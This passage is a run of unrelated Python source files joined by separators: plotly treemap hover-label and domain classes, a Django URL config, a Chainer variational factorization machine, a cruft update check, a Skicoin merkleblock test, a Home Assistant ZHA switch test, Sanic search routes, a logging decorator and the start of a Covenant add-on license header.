royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# bordercolorsrc
# --------------
@property
def bordercolorsrc(self):
"""
Sets the source reference on plot.ly for bordercolor .
The 'bordercolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bordercolorsrc"]
@bordercolorsrc.setter
def bordercolorsrc(self, val):
self["bordercolorsrc"] = val
# font
# ----
@property
def font(self):
"""
Sets the font used in hover labels.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.treemap.hoverlabel.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.treemap.hoverlabel.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# namelength
# ----------
@property
def namelength(self):
"""
Sets the default length (in number of characters) of the trace
name in the hover labels for all traces. -1 shows the whole
name regardless of length. 0-3 shows the first 0-3 characters,
and an integer >3 will show the whole name if it is less than
that many characters, but if it is longer, will truncate to
`namelength - 3` characters and add an ellipsis.
The 'namelength' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|numpy.ndarray
"""
return self["namelength"]
@namelength.setter
def namelength(self, val):
self["namelength"] = val
# namelengthsrc
# -------------
@property
def namelengthsrc(self):
"""
Sets the source reference on plot.ly for namelength .
The 'namelengthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["namelengthsrc"]
@namelengthsrc.setter
def namelengthsrc(self, val):
self["namelengthsrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
"""
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
"""
Construct a new Hoverlabel object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Hoverlabel
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
Returns
-------
Hoverlabel
"""
super(Hoverlabel, self).__init__("hoverlabel")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Hoverlabel"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import hoverlabel as v_hoverlabel
# Initialize validators
# ---------------------
self._validators["align"] = v_hoverlabel.AlignValidator()
self._validators["alignsrc"] = v_hoverlabel.AlignsrcValidator()
self._validators["bgcolor"] = v_hoverlabel.BgcolorValidator()
self._validators["bgcolorsrc"] = v_hoverlabel.BgcolorsrcValidator()
self._validators["bordercolor"] = v_hoverlabel.BordercolorValidator()
self._validators["bordercolorsrc"] = v_hoverlabel.BordercolorsrcValidator()
self._validators["font"] = v_hoverlabel.FontValidator()
self._validators["namelength"] = v_hoverlabel.NamelengthValidator()
self._validators["namelengthsrc"] = v_hoverlabel.NamelengthsrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("align", None)
self["align"] = align if align is not None else _v
_v = arg.pop("alignsrc", None)
self["alignsrc"] = alignsrc if alignsrc is not None else _v
_v = arg.pop("bgcolor", None)
self["bgcolor"] = bgcolor if bgcolor is not None else _v
_v = arg.pop("bgcolorsrc", None)
self["bgcolorsrc"] = bgcolorsrc if bgcolorsrc is not None else _v
_v = arg.pop("bordercolor", None)
self["bordercolor"] = bordercolor if bordercolor is not None else _v
_v = arg.pop("bordercolorsrc", None)
self["bordercolorsrc"] = bordercolorsrc if bordercolorsrc is not None else _v
_v = arg.pop("font", None)
self["font"] = font if font is not None else _v
_v = arg.pop("namelength", None)
self["namelength"] = namelength if namelength is not None else _v
_v = arg.pop("namelengthsrc", None)
self["namelengthsrc"] = namelengthsrc if namelengthsrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Domain(_BaseTraceHierarchyType):
# column
# ------
@property
def column(self):
"""
If there is a layout grid, use the domain for this column in
the grid for this treemap trace .
The 'column' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["column"]
@column.setter
def column(self, val):
self["column"] = val
# row
# ---
@property
def row(self):
"""
If there is a layout grid, use the domain for this row in the
grid for this treemap trace .
The 'row' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["row"]
@row.setter
def row(self, val):
self["row"] = val
# x
# -
@property
def x(self):
"""
Sets the horizontal domain of this treemap trace (in plot
fraction).
The 'x' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'x[0]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
(1) The 'x[1]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
list
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# y
# -
@property
def y(self):
"""
Sets the vertical domain of this treemap trace (in plot
fraction).
The 'y' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'y[0]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
(1) The 'y[1]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
list
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
column
If there is a layout grid, use the domain for this
column in the grid for this treemap trace .
row
If there is a layout grid, use the domain for this row
in the grid for this treemap trace .
x
Sets the horizontal domain of this treemap trace (in
plot fraction).
y
Sets the vertical domain of this treemap trace (in plot
fraction).
"""
def __init__(self, arg=None, column=None, row=None, x=None, y=None, **kwargs):
"""
Construct a new Domain object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Domain
column
If there is a layout grid, use the domain for this
column in the grid for this treemap trace .
row
If there is a layout grid, use the domain for this row
in the grid for this treemap trace .
x
Sets the horizontal domain of this treemap trace (in
plot fraction).
y
Sets the vertical domain of this treemap trace (in plot
fraction).
Returns
-------
Domain
"""
super(Domain, self).__init__("domain")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Domain
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Domain"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import domain as v_domain
# Initialize validators
# ---------------------
self._validators["column"] = v_domain.ColumnValidator()
self._validators["row"] = v_domain.RowValidator()
self._validators["x"] = v_domain.XValidator()
self._validators["y"] = v_domain.YValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("column", None)
self["column"] = column if column is not None else _v
_v = arg.pop("row", None)
self["row"] = row if row is not None else _v
_v = arg.pop("x", None)
self["x"] = x if x is not None else _v
_v = arg.pop("y", None)
self["y"] = y if y is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
__all__ = [
"Domain",
"Hoverlabel",
"Insidetextfont",
"Marker",
"Outsidetextfont",
"Pathbar",
"Stream",
"Textfont",
"Tiling",
"hoverlabel",
"marker",
"pathbar",
]
from plotly.graph_objs.treemap import pathbar
from plotly.graph_objs.treemap import marker
from plotly.graph_objs.treemap import hoverlabel
|
from django.conf.urls import url,include
from django.contrib import admin
from django.contrib.auth import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'',include('instagram.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'}),
]
|
import chainer
from chainer import training
from chainer.training import extensions
from chainer.datasets import TupleDataset
from chainer import Chain
from chainer import links as L
from chainer import functions as F
from chainer import reporter
from chainer import cuda
import numpy as np
def dot(a, b):
""" Simple dot product"""
return F.sum(a * b, axis=-1)
def batch_interactions(x):
xp = cuda.get_array_module(x.data)
batchsize = x.shape[0]
shape = (batchsize, x.shape[1] ** 2)
left = xp.tile(x.data, (1, x.shape[1]))
right = xp.repeat(x.data, x.shape[1]).reshape(shape)
return left, right
class VFM(Chain):
lv_floor = -100.0
def __init__(self, n_features=None, n_dim=1 , lossfun=F.mean_squared_error,
lambda0=1, lambda1=1, lambda2=1, init_bias_mu=0.0,
init_bias_lv=0.0, intx_term=True, total_nobs=1):
self.n_dim = n_dim
self.n_features = n_features
self.lossfun = lossfun
self.lambda0 = lambda0
self.lambda1 = lambda1
self.lambda2 = lambda2
self.intx_term = intx_term
self.total_nobs = total_nobs
# In contrast to the FM model, the slopes and latent vectors
# will have means (mu) and log variances (lv) for each component.
super(VFM, self).__init__(bias_mu=L.Bias(shape=(1,)),
bias_lv=L.Bias(shape=(1,)),
slop_mu=L.Bias(shape=(1, 1)),
slop_lv=L.Bias(shape=(1, 1)),
slop_delta_mu=L.EmbedID(n_features, 1,
ignore_label=-1),
slop_delta_lv=L.EmbedID(n_features, 1,
ignore_label=-1),
feat_mu_vec=L.Bias(shape=(1, 1, n_dim)),
feat_lv_vec=L.Bias(shape=(1, 1, n_dim)),
feat_delta_mu=L.EmbedID(n_features, n_dim,
ignore_label=-1),
feat_delta_lv=L.EmbedID(n_features, n_dim,
ignore_label=-1))
# Xavier initialize weights
c = np.sqrt(n_features * n_dim) * 1e3
d = np.sqrt(n_features) * 1e3
self.feat_delta_mu.W.data[...] = np.random.randn(n_features, n_dim) / c
self.feat_delta_lv.W.data[...] = np.random.randn(n_features, n_dim) / c
self.slop_delta_mu.W.data[...] = np.random.randn(n_features, 1) / d
self.slop_delta_lv.W.data[...] = np.random.randn(n_features, 1) / d
self.bias_mu.b.data[...] *= 0.0
self.bias_mu.b.data[...] += init_bias_mu
self.bias_lv.b.data[...] *= 0.0
self.bias_lv.b.data[...] += init_bias_lv
def term_bias(self, bs, train=True):
""" Compute overall bias and broadcast to shape of batchsize
"""
shape = (bs, 1,)
# Bias is drawn from a Gaussian with given mu and log variance
bs_mu = F.broadcast_to(self.bias_mu.b, shape)
bs_lv = F.broadcast_to(self.bias_lv.b, shape)
bias = F.flatten(F.gaussian(bs_mu, bs_lv))
# Add a very negative log variance so we're sampling
# from a very narrow distribution about the mean.
# Useful for validation dataset when we want to only guess
# the mean.
if not train:
bs_lv += self.lv_floor
# Compute prior on the bias, so compute the KL div
# from the KL(N(mu_bias, var_bias) | N(0, 1))
kld = F.gaussian_kl_divergence(self.bias_mu.b, self.bias_lv.b)
return bias, kld
def term_slop(self, loc, val, bs, nf, train=True):
""" Compute the slope for each active feature.
"""
shape = (bs, nf)
# Reshape all of our constants
pr_mu = F.broadcast_to(self.slop_mu.b, shape)
pr_lv = F.broadcast_to(self.slop_lv.b, shape)
# This is either zero or a very negative number
# indicating to sample N(mean, logvar) or just draw
# the mean preicsely
if not train:
pr_lv += self.lv_floor
# The feature slopes are grouped together so that they
# all share a common mean. Then individual features slop_delta_lv
# are shrunk towards zero, which effectively sets features to fall
# back on the group mean.
sl_mu = F.reshape(self.slop_delta_mu(loc), shape) + pr_mu
sl_lv = F.reshape(self.slop_delta_lv(loc), shape) + pr_lv
coef = F.gaussian(sl_mu, sl_lv)
slop = F.sum(coef * val, axis=1)
# Calculate divergence between group mean and N(0, 1)
kld1 = F.gaussian_kl_divergence(self.slop_mu.b, self.slop_lv.b)
# Calculate divergence of individual delta means and delta vars
args = (self.slop_delta_mu.W, self.slop_delta_lv.W)
kld2 = F.gaussian_kl_divergence(*args)
return slop, kld1 + kld2
def term_feat(self, iloc, jloc, ival, jval, bs, nf, train=True):
# Change all of the shapes to form interaction vectors
shape = (bs, nf * 2, self.n_dim)
feat_mu_vec = F.broadcast_to(self.feat_mu_vec.b, shape)
feat_lv_vec = F.broadcast_to(self.feat_lv_vec.b, shape)
if not train:
feat_lv_vec += self.lv_floor
# Construct the interaction mean and variance
# iloc is (bs, nf), feat(iloc) is (bs, nf, ndim) and
# dot(feat, feat) is (bs, nf)
ivec = F.gaussian(feat_mu_vec + self.feat_delta_mu(iloc),
feat_lv_vec + self.feat_delta_lv(iloc))
jvec = F.gaussian(feat_mu_vec + self.feat_delta_mu(jloc),
feat_lv_vec + self.feat_delta_lv(jloc))
# feat is (bs, )
feat = dot(F.sum(ivec * jvec, axis=2), ival * jval)
# Compute the KLD for the group mean vector and variance vector
kld1 = F.gaussian_kl_divergence(self.feat_mu_vec.b, self.feat_lv_vec.b)
# Compute the KLD for vector deviations from the group mean and var
kld2 = F.gaussian_kl_divergence(self.feat_delta_mu.W,
self.feat_delta_lv.W)
return feat, kld1 + kld2
def forward(self, loc, val, y, train=True):
""" Given the sparse feature vector defined by location
integers for the column index and the value at that index.
y ~ c + sum(w_i x_i) + sum_ij( <v_i, v_j> * x_i * x_j)
Parameters
----------
val : array of float
Values in the feature array. Should of shape (batchsize, n_feat_max)
loc : array of int
Location of the non-zero columns in the sparse vector. Should be of
shape (batchsize, n_feat_max)
y : array of float
Array of expected outcome.
train: bool
If True uses the reparameterization trick to estimate variables.
If False, this sets the variance to nearly zero such that
parameters are always set to the mean with no noise, which is useful
at test time.
"""
bs = val.data.shape[0]
nf = val.data.shape[1]
iloc, jloc = batch_interactions(loc)
ival, jval = batch_interactions(val)
# Compute scalar bias term
bias, kld0 = self.term_bias(bs, train=train)
# Compute the feature weights
slop, kld1 = self.term_slop(loc, val, bs, nf, train=train)
# Compute factorized weights on interaction features
feat, kld2 = self.term_feat(iloc, jloc, ival, jval,
bs, nf, train=train)
# Optionally choose to include the interaction term
# without this is linear regression
pred = bias + slop
if self.intx_term:
pred += feat
return pred, kld0, kld1, kld2
def __call__(self, loc, val, y, train=True):
bs = val.data.shape[0]
pred, kld0, kld1, kld2 = self.forward(loc, val, y, train=train)
# Compute MSE loss
mse = F.mean_squared_error(pred, y)
rmse = F.sqrt(mse) # Only used for reporting
# Now compute the total KLD loss
kldt = kld0 * self.lambda0 + kld1 * self.lambda1 + kld2 * self.lambda2
# Total loss is MSE plus regularization losses
loss = mse + kldt * (1.0 / self.total_nobs)
# Log the errors
logs = {'loss': loss, 'rmse': rmse, 'kld0': kld0, 'kld1': kld1,
'kld2': kld2, 'kldt': kldt, 'bias': F.sum(self.bias_mu.b)}
reporter.report(logs, self)
return loss
class TestModeEvaluator(extensions.Evaluator):
def evaluate(self):
model = self.get_target('main')
model.train = False
ret = super(TestModeEvaluator, self).evaluate()
model.train = True
return ret
def fit(model, train, valid, device=-1, batchsize=4096, n_epoch=500,
resume=None, alpha=1e-3):
if device >= 0:
chainer.cuda.get_device(device).use()
model.to_gpu(device)
optimizer = chainer.optimizers.Adam(alpha)
optimizer.setup(model)
# Setup iterators
train_iter = chainer.iterators.SerialIterator(train, batchsize)
valid_iter = chainer.iterators.SerialIterator(valid, batchsize,
repeat=False, shuffle=False)
updater = training.StandardUpdater(train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (n_epoch, 'epoch'),
out='out_' + str(device))
# Setup logging, printing & saving
keys = ['loss', 'rmse', 'bias', 'kld0', 'kld1']
keys += ['kldg', 'kldi', 'hypg', 'hypi']
keys += ['hypglv', 'hypilv']
reports = ['epoch']
reports += ['main/' + key for key in keys]
reports += ['validation/main/rmse']
trainer.extend(TestModeEvaluator(valid_iter, model, device=device))
trainer.extend(extensions.Evaluator(valid_iter, model, device=device))
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.snapshot(), trigger=(10, 'epoch'))
trainer.extend(extensions.LogReport(trigger=(1, 'epoch')))
trainer.extend(extensions.PrintReport(reports))
trainer.extend(extensions.ProgressBar(update_interval=10))
# If previous model detected, resume
if resume:
print("Loading from {}".format(resume))
chainer.serializers.load_npz(resume, trainer)
# Run the model
trainer.run()
|
import json
from pathlib import Path
from typing import Optional
import typer
from . import utils
from .utils import example
from .utils.iohelper import AltTemporaryDirectory
@example()
def check(
project_dir: Path = Path("."), checkout: Optional[str] = None, strict: bool = True
) -> bool:
"""Checks to see if there have been any updates to the Cookiecutter template
used to generate this project."""
cruft_file = utils.cruft.get_cruft_file(project_dir)
cruft_state = json.loads(cruft_file.read_text())
with AltTemporaryDirectory() as cookiecutter_template_dir:
with utils.cookiecutter.get_cookiecutter_repo(
cruft_state["template"],
Path(cookiecutter_template_dir),
checkout,
filter="blob:none",
no_checkout=True,
) as repo:
last_commit = repo.head.object.hexsha
if utils.cruft.is_project_updated(repo, cruft_state["commit"], last_commit, strict):
typer.secho(
"SUCCESS: Good work! Project's cruft is up to date "
"and as clean as possible :).",
fg=typer.colors.GREEN,
)
return True
typer.secho(
"FAILURE: Project's cruft is out of date! Run `cruft update` to clean this mess up.",
fg=typer.colors.RED,
)
return False
|
#!/usr/bin/env python2
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Copyright (c) 2014-2020 The Skicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test merkleblock fetch/validation
#
from test_framework.test_framework import SkicoinTestFramework
from test_framework.util import *
class MerkleBlockTest(SkicoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 4)
def setup_network(self):
self.nodes = []
# Nodes 0/1 are "wallet" nodes
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-debug"]))
# Nodes 2/3 are used for testing
self.nodes.append(start_node(2, self.options.tmpdir, ["-debug"]))
self.nodes.append(start_node(3, self.options.tmpdir, ["-debug", "-txindex"]))
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[0], 2)
connect_nodes(self.nodes[0], 3)
self.is_network_split = False
self.sync_all()
def run_test(self):
print "Mining blocks..."
self.nodes[0].generate(105)
self.sync_all()
chain_height = self.nodes[1].getblockcount()
assert_equal(chain_height, 105)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
node0utxos = self.nodes[0].listunspent(1)
tx1 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 500})
txid1 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx1)["hex"])
tx2 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 500})
txid2 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx2)["hex"])
assert_raises(JSONRPCException, self.nodes[0].gettxoutproof, [txid1])
self.nodes[0].generate(1)
blockhash = self.nodes[0].getblockhash(chain_height + 1)
self.sync_all()
txlist = []
blocktxn = self.nodes[0].getblock(blockhash, True)["tx"]
txlist.append(blocktxn[1])
txlist.append(blocktxn[2])
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1])), [txid1])
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2], blockhash)), txlist)
txin_spent = self.nodes[1].listunspent(1).pop()
tx3 = self.nodes[1].createrawtransaction([txin_spent], {self.nodes[0].getnewaddress(): 500})
self.nodes[0].sendrawtransaction(self.nodes[1].signrawtransaction(tx3)["hex"])
self.nodes[0].generate(1)
self.sync_all()
txid_spent = txin_spent["txid"]
txid_unspent = txid1 if txin_spent["txid"] != txid1 else txid2
# We can't find the block from a fully-spent tx
# Doesn't apply to Skicoin Core - we have txindex always on
# assert_raises(JSONRPCException, self.nodes[2].gettxoutproof, [txid_spent])
# ...but we can if we specify the block
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_spent], blockhash)), [txid_spent])
# ...or if the first tx is not fully-spent
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_unspent])), [txid_unspent])
try:
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)
except JSONRPCException:
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid2, txid1])), txlist)
# ...or if we have a -txindex
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[3].gettxoutproof([txid_spent])), [txid_spent])
if __name__ == '__main__':
MerkleBlockTest().main()
|
"""Test zha switch."""
from unittest.mock import call, patch
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
find_entity_id,
make_attribute,
make_zcl_header,
)
from tests.common import mock_coro
ON = 1
OFF = 0
@pytest.fixture
def zigpy_device(zigpy_device_mock):
"""Device tracker zigpy device."""
endpoints = {
1: {
"in_clusters": [general.Basic.cluster_id, general.OnOff.cluster_id],
"out_clusters": [],
"device_type": 0,
}
}
return zigpy_device_mock(endpoints)
async def test_switch(hass, zha_gateway, zha_device_joined_restored, zigpy_device):
"""Test zha switch platform."""
zha_device = await zha_device_joined_restored(zigpy_device)
cluster = zigpy_device.endpoints.get(1).on_off
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
assert entity_id is not None
# test that the switch was created and that its state is unavailable
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and device
await async_enable_traffic(hass, zha_gateway, [zha_device])
# test that the state has changed from unavailable to off
assert hass.states.get(entity_id).state == STATE_OFF
# turn on at switch
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# turn off at switch
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# turn on from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
):
# turn on via UI
await hass.services.async_call(
DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, ON, (), expect_reply=True, manufacturer=None
)
# turn off from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
):
# turn off via UI
await hass.services.async_call(
DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, OFF, (), expect_reply=True, manufacturer=None
)
# test joining a new switch to the network and HA
cluster.bind.reset_mock()
cluster.configure_reporting.reset_mock()
await zha_gateway.async_device_initialized(zigpy_device)
await hass.async_block_till_done()
assert cluster.bind.call_count == 1
assert cluster.bind.await_count == 1
assert cluster.configure_reporting.call_count == 1
assert cluster.configure_reporting.await_count == 1
|
"""
This file contains all routes for the /search API
"""
from sanic import Blueprint
from sanic.response import HTTPResponse
from dp4py_sanic.api.response.json_response import json
from dp_conceptual_search.config import CONFIG
from dp_conceptual_search.api.request import ONSRequest
from dp_conceptual_search.ons.search.index import Index
from dp_conceptual_search.ons.search.client.search_engine import SearchEngine
from dp_conceptual_search.ons.search.response.search_result import SearchResult
from dp_conceptual_search.api.search.sanic_search_engine import SanicSearchEngine
from dp_conceptual_search.api.search.conceptual import routes as conceptual_routes
search_blueprint = Blueprint('search', url_prefix='/search')
@search_blueprint.route('/departments', methods=['GET'], strict_slashes=True)
async def ons_departments_query(request: ONSRequest) -> HTTPResponse:
"""
Handles departments queries to the departments index
:param request:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.DEPARTMENTS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.departments_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/', methods=['GET', 'POST'], strict_slashes=False)
async def search(request: ONSRequest) -> HTTPResponse:
"""
API which combines the content, counts and featured result queries into one
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.search(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
result = await sanic_search_engine.search(request)
return json(request, result, 200)
@search_blueprint.route('/content', methods=['GET', 'POST'], strict_slashes=True)
async def ons_content_query(request: ONSRequest) -> HTTPResponse:
"""
Handles content queries to the API.
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_content_query(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.content_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/counts', methods=['GET', 'POST'], strict_slashes=True)
async def ons_counts_query(request: ONSRequest) -> HTTPResponse:
"""
Handles type counts queries to the API.
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_counts_query(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.type_counts_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/featured', methods=['GET'], strict_slashes=True)
async def ons_featured_result_query(request: ONSRequest) -> HTTPResponse:
"""
Handles featured result queries (i.e product and home page census pages)
:param request:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.featured_result_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/uri/', methods=['GET', 'POST'])
@search_blueprint.route('/uri/<path:path>', methods=['GET', 'POST'])
async def search_by_uri(request: ONSRequest, path: str):
"""
Search for a page by it's uri
:param request:
:param path:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.search_by_uri(request, path)
return json(request, search_result.to_dict(), 200)
|
# -*- coding: UTF-8 -*-
from common_utils.new_log import NewLog
class LogDecorator:
log = NewLog(__name__)
logger = log.get_log()
def __call__(self, func):
def wrapper(*args, **kw):
self.logger.debug("call method %s ===============" % func.__name__)
self.logger.debug("method [%s] input args: [%s], kw: [%s]" % (func.__name__, args, kw))
result = func(*args, **kw)
self.logger.debug("method [%s] response: [%s]" % (func.__name__, result))
return result
return wrapper
|
# -*- coding: utf-8 -*-
'''
Covenant Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
